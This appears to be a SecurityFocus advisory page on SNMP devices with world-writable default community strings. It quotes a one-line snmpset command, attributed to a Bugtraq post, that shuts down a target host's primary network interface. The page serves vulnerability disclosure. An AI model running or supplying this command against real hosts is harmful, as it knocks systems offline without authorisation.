Multiple Vendor SNMP World Writeable Community Vulnerability

Michal Zalewski wrote the following exploit example in his post to Bugtraq regarding this issue:

snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2

This will make the primary interface on the target host (with a default community of public or private) change state to two, which is "down".


 

Privacy Statement
Copyright 2010, SecurityFocus